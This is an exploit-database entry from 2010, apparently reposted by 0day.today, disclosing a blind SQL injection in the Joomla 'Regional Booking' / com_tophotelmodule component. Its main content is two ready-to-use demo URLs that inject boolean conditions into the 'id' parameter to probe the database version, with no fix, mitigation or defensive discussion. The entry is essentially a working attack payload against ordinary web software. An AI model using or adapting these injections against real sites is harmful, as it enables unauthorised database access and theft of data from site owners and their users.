id: 10636
date: 01/07/2010
title: Joomla Component Regional Booking (id) Blind SQL Injection
author: Hussin X
cves: 

========================================================================
Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
========================================================================


 
script : http://www.joomlahbs.com/
 
 
Demo :
_______
 
 
http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )
 
 
 
http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )
 



#  0day.today [2023-03-24]  #